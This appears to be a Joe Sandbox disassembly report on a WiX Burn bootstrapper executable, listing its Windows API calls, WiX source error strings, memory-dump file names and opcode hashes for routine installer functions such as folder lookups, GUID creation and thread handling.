• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FreeString
• String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
• API String ID: 3341692771-772478478
• Opcode ID: 6eca99ec404650e50dfa6a6b67351209a6140016bc32e3fdff79cb19b0d36ac1
• Instruction ID: 574c195aa48a5c3056bf343826c70b88b885b9dbd86eeab10a3c7c066eb7048b
• Opcode Fuzzy Hash: 6eca99ec404650e50dfa6a6b67351209a6140016bc32e3fdff79cb19b0d36ac1
• Instruction Fuzzy Hash: AB115B72A40325B7D7315D854C46FEF6A1CCB51B66F11802BBB087A285D6BC4E00A3EE
APIs
• SHGetFolderPathW.SHELL32(00000000,004087CC,00000000,00000000,?,?,00000000,00000000), ref: 0046D4AB
Strings
• Failed to copy shell folder path: %ls, xrefs: 0046D4E6
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 0046D514
• Failed to get folder path for CSIDL: %d, xrefs: 0046D4BA
• Failed to backslash terminate shell folder path: %ls, xrefs: 0046D505
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FolderPath
• String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
• API String ID: 1514166925-1906042722
• Opcode ID: 2e736f812fd3851822d9b88d5a0a6c08e8700350310d5eb61fb6302d7eed69c2
• Instruction ID: 4af6c11ae24b7e3afc7386fa16f8c287abd93e964568cdaefddf0d60aa7785d6
• Opcode Fuzzy Hash: 2e736f812fd3851822d9b88d5a0a6c08e8700350310d5eb61fb6302d7eed69c2
• Instruction Fuzzy Hash: 61113DB1F4031877D7206A548C46F6B776CDB05B58F10016BFD05BA2C1F6789D044BA5
APIs
• CreateThread.KERNEL32(00000000,00000000,004373B0,00000000,00000000,00000000), ref: 00438A24
• GetLastError.KERNEL32(?,00414B36,?,?,000000C8,00000000,00000001,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000), ref: 00438A31
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CreateErrorLastThread
                                                                                                                                                          • String ID: Bootstrapper application engine already listening on a pipe.$Failed to create bootstrapper application engine thread.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 1689873465-46964361
                                                                                                                                                          • Opcode ID: 7171344e906e1874294d640f0466a97ea4bd5e68f2b1153c11a91079cde4a7e1
                                                                                                                                                          • Instruction ID: 62b0d50a9faf480f047ee53e6530a8b5804fe7ed001656633e3585f34a656f95
                                                                                                                                                          • Opcode Fuzzy Hash: 7171344e906e1874294d640f0466a97ea4bd5e68f2b1153c11a91079cde4a7e1
                                                                                                                                                          • Instruction Fuzzy Hash: EE110C3268173432D52171565C4AF97AE4C9F46BB5F21403FBE087B2C1DA6CA80186FC
APIs
• UuidCreate.RPCRT4(?), ref: 00470129
• StringFromGUID2.OLE32(?,00000000,00000027), ref: 00470150
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CreateFromStringUuid
• String ID: Failed to convert guid into string.$UuidCreate failed.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\guidutil.cpp
• API String ID: 4041566446-1001591293
• Opcode ID: 95304ec9801a92c52182d2af1cabdb87b72fae921d80691ffed27177aec2601f
• Instruction ID: 6d2e5f8e913ccf942972fdaeccbb16cf9d3eeda69b5bc9404d6d91fbffdf624f
• Opcode Fuzzy Hash: 95304ec9801a92c52182d2af1cabdb87b72fae921d80691ffed27177aec2601f
• Instruction Fuzzy Hash: 6F01DB31740208B7D720AAB5CC4AFEF7669DB59715F50003BFA05FB1D1E1688D0486A5
APIs
  • Part of subcall function 004017B5: WaitForSingleObject.KERNEL32(?,00439CBA,00000000,?,00439CBA,?,000000FF), ref: 004017C1
• GetExitCodeThread.KERNEL32(?,00000000,?,004220D3,00000000), ref: 00470D92
• GetLastError.KERNEL32 ref: 00470D9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CodeErrorExitLastObjectSingleThreadWait
• String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
• API String ID: 113644094-3739402558
• Opcode ID: 77b5f221820e74421df7d2d64ba5a4dd6dd8e69faadf8b67ba6da3bf946a85da
• Instruction ID: c02138e16682ed155c3cd61dff5a4b84735651cb7b118431fc655b3d58b5043a
• Opcode Fuzzy Hash: 77b5f221820e74421df7d2d64ba5a4dd6dd8e69faadf8b67ba6da3bf946a85da
• Instruction Fuzzy Hash: 45012B32E81324B3D73129A54C0EFEF2944DB11BA0F058167FD0CBA3D1E2AD5C4082D9
APIs
• SetEvent.KERNEL32(?,?,00000000,?,004097CA,?,?,?,?,?,?,?,?), ref: 004223B6
• GetLastError.KERNEL32(?,004097CA,?,?,?,?,?,?,?,?), ref: 004223C0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorEventLast
• String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix\wix\src\burn\engine\core.cpp
• API String ID: 3848097054-2646491605
• Opcode ID: 34c409f72df4aad2feba5b1fb33899d689b1f7b2bc95ecab502322662644b0d8
• Instruction ID: da412350b23cdd2036ec80d672f2659171a0bb9480160089bb9c7a37defc6a50
• Opcode Fuzzy Hash: 34c409f72df4aad2feba5b1fb33899d689b1f7b2bc95ecab502322662644b0d8
• Instruction Fuzzy Hash: 61012632B40A3537D12121595C46F9BA9489B00B74F914237BE08BB2E0B2ECBC5086DD
APIs
• WaitForSingleObject.KERNEL32(?,00439CBA,00000000,?,00439CBA,?,000000FF), ref: 004017C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 24740636-253905355
• Opcode ID: be8a74e25ffdbfe2ad4de4bc7e1299f9976601bdc2fcb6c519a360fae017ef50
• Instruction ID: db2fafc80f0ae2db882da362e60db3d2213ca837f740fda961f402128fafcabc
• Opcode Fuzzy Hash: be8a74e25ffdbfe2ad4de4bc7e1299f9976601bdc2fcb6c519a360fae017ef50
• Instruction Fuzzy Hash: 9901A777A4522877D22121454C45FA7691D9B457B0F96C07BFD0CFB2E2963D8C0152ED
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,83C6D434,?,?,00000000,00476EFF,000000FF,?,00459A9A,00459B7E,?,00459A6E,00000000), ref: 00459AF3
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00459B05
• FreeLibrary.KERNEL32(00000000,?,?,00000000,00476EFF,000000FF,?,00459A9A,00459B7E,?,00459A6E,00000000), ref: 00459B27
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 7190d2d2ebecd383be5ddc9813ab014f9718af53060f3d2bb5944e19a03ad636
• Instruction ID: 2c8aa5cf8c816d909afbb39d79f127b4dee9f7c2bacbd688ba7e27945d44568b
• Opcode Fuzzy Hash: 7190d2d2ebecd383be5ddc9813ab014f9718af53060f3d2bb5944e19a03ad636
• Instruction Fuzzy Hash: 6401A231A08619EFDB119F44DC05FEEBBB9FB04B11F440236F811A26E1DB799844CA98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\verutil.cpp
• API String ID: 1617791916-2152106040
• Opcode ID: 29128b94b015edc55ec88c1c0c42853ec8869e0002c95aecf9c12b2b48e405fb
• Instruction ID: 410ebc8ff978e23cf562ec8a9c6ab99e66892f5fa8bc397a58aac6db8ddeff18
• Opcode Fuzzy Hash: 29128b94b015edc55ec88c1c0c42853ec8869e0002c95aecf9c12b2b48e405fb
• Instruction Fuzzy Hash: 0221B6B1A443147BD7249F5A8CC5F677A98DB99760F10417FFD48AF382E2B88C0086A9
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040C14A
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0040C1D2
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C1C2
                                                                                                                                                          • Failed to get value of variable: %ls, xrefs: 0040C184
                                                                                                                                                          • Failed to get value as version for variable: %ls, xrefs: 0040C1B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-3877478192
                                                                                                                                                          • Opcode ID: 9498e18d91cd803432a73621d9f80ef5d83f89e53396f77353e9963671704d1c
                                                                                                                                                          • Instruction ID: 574ef0fb8053fd087bf130b0803d3d6fc5c2ead358f305387f358faba80cce68
                                                                                                                                                          • Opcode Fuzzy Hash: 9498e18d91cd803432a73621d9f80ef5d83f89e53396f77353e9963671704d1c
                                                                                                                                                          • Instruction Fuzzy Hash: F401C832A80224FBDF115F50CC4AF8A3A25DB04765F108276FE08BE1E1D7B99A509BD8
                                                                                                                                                          APIs
                                                                                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 00401651
                                                                                                                                                            • Part of subcall function 00401453: GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
                                                                                                                                                            • Part of subcall function 00401453: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
                                                                                                                                                          • SetDefaultDllDirectories.KERNELBASE ref: 00401673
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 00401679
                                                                                                                                                          • SetDllDirectoryW.KERNEL32 ref: 00401696
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,004011BA,cabinet.dll,00000009,?,00000000), ref: 004016A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$DefaultDirectoriesDirectoryHandleHeapInformationModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2226491684-0
                                                                                                                                                          • Opcode ID: d48458f4f4ccb4a5e1ada93a125564d6035d6516b5022034d9fb52c787f0c9ba
                                                                                                                                                          • Instruction ID: d7b2a472efe89d176b3165b33a13f653d1d5e660ca6525406a815b62733955cd
                                                                                                                                                          • Opcode Fuzzy Hash: d48458f4f4ccb4a5e1ada93a125564d6035d6516b5022034d9fb52c787f0c9ba
                                                                                                                                                          • Instruction Fuzzy Hash: 8C019231501115ABCB20AF15DC099AF7B69FF80791B448137F819672B4CA79A941CFA8
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,0040E97F,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0040EB78,00000001), ref: 0040C0BD
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,?,0040E97F,00000000,?,feclient.dll,00000001,00000000,00000001,00000006,00000006,?,0040EB78), ref: 0040C131
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to copy value of variable: %ls, xrefs: 0040C10F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040C121
                                                                                                                                                          • Failed to get value of variable: %ls, xrefs: 0040C0E3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3168844106-137256104
                                                                                                                                                          • Opcode ID: d089b050b8b1840b0a77e41697f838382790e016444f7829ac2f3033c4461d12
                                                                                                                                                          • Instruction ID: 40007c2c0fc9f95719c9480caae907e9b7ac99b110b42d982e9faef4d2760d78
                                                                                                                                                          • Opcode Fuzzy Hash: d089b050b8b1840b0a77e41697f838382790e016444f7829ac2f3033c4461d12
                                                                                                                                                          • Instruction Fuzzy Hash: FC018435640228FBDF116F55CC4AFCE3A14DF04765F108122FE08B91D1D6B99A609AD8
                                                                                                                                                          APIs
                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0042B873
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0042B881
                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0042B8A4
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042B8AC
                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0042B8B3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSelect$CompatibleCreateDeleteStretch
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 732282326-0
                                                                                                                                                          • Opcode ID: 5f70854fc188ece16cf65a49b62dd9752d2a7cb6fa0c4d79b1f800c80ee0f615
                                                                                                                                                          • Instruction ID: 29c8d5d6b762205c6008d8a801a03ac8536dc3be2063f87b4b0670ba188ab02a
                                                                                                                                                          • Opcode Fuzzy Hash: 5f70854fc188ece16cf65a49b62dd9752d2a7cb6fa0c4d79b1f800c80ee0f615
                                                                                                                                                          • Instruction Fuzzy Hash: D9F0F876105344BFDB211FA1EC48DBBBFAEFB483613508829FA5A82121C7329C54DB64
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FC6B, 0041FCAE
                                                                                                                                                          • Failed to copy provider key for compatible entry., xrefs: 0041FC59
                                                                                                                                                          • Failed to get provider information for compatible package: %ls, xrefs: 0041FC9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 3535843008-891480179
                                                                                                                                                          • Opcode ID: 859c231efaecc4d4b60d080682fc33df8d0fb360a6ca5658a4a7cac096e9c856
                                                                                                                                                          • Instruction ID: 0f0128e2610420067fc15b1d715e229cffa9a49603b33576e788fb9082614647
                                                                                                                                                          • Opcode Fuzzy Hash: 859c231efaecc4d4b60d080682fc33df8d0fb360a6ca5658a4a7cac096e9c856
                                                                                                                                                          • Instruction Fuzzy Hash: 80414271E0061AEFDB14DFA4C841FEEBBB4BB04710F10426AE915F7380E3785A859B99
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F8B9: RegCloseKey.ADVAPI32(00000214,00000120,00000120,00020019,00000214,000004A0,00000120,000001F8,00000120,00000120,?,?,?,0041FCE3,?,?), ref: 0046FA0A
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,00000000,000000FF,?,?,000001F8,00000000,00000000,000004A0,00000120,00000000,?,0041FA04), ref: 0041FD38
Strings
• d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0041FD85
• Failed to initialize provider key bundle id., xrefs: 0041FD73
• Failed to get provider key bundle id., xrefs: 0041FD0C
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CloseCompareString
• String ID: Failed to get provider key bundle id.$Failed to initialize provider key bundle id.$d:\a\wix\wix\src\burn\engine\dependency.cpp
• API String ID: 446873843-22166859
• Opcode ID: 8c193ad363b6fba0a87c04a9d594eca1971e9ff03780b9823cc69eb306fd9d2d
• Instruction ID: a8f402618ac758df1e63075a48bbc03f2022fec066cf35c1aa9af0d939a0fcc6
• Opcode Fuzzy Hash: 8c193ad363b6fba0a87c04a9d594eca1971e9ff03780b9823cc69eb306fd9d2d
• Instruction Fuzzy Hash: 21213031640211B7DB252A54AC46FFB3B15FF44721F500177FE06BA2D1D6B94CD187A9
APIs
• CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224F7
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224FD
Strings
Similarity
• API ID: CreateErrorLastProcess
• String ID: CreateProcessW failed with return code: %d$d:\a\wix\wix\src\burn\engine\core.cpp
• API String ID: 2919029540-2450435645
• Opcode ID: a8ebf3fee6370b8e8a1dde527b33422e14cf7e710ee150d8ef001fc4ac064c42
• Instruction ID: 7425ab7fcaedabe76eb5de61a9264da31149d2fc0723cf7abb5d6a2b381a85e2
• Opcode Fuzzy Hash: a8ebf3fee6370b8e8a1dde527b33422e14cf7e710ee150d8ef001fc4ac064c42
• Instruction Fuzzy Hash: E4112436A0022877DB206E529D09E9F3E6CEFC4B54F45402AFE04BB240E678DC41CBB8
APIs
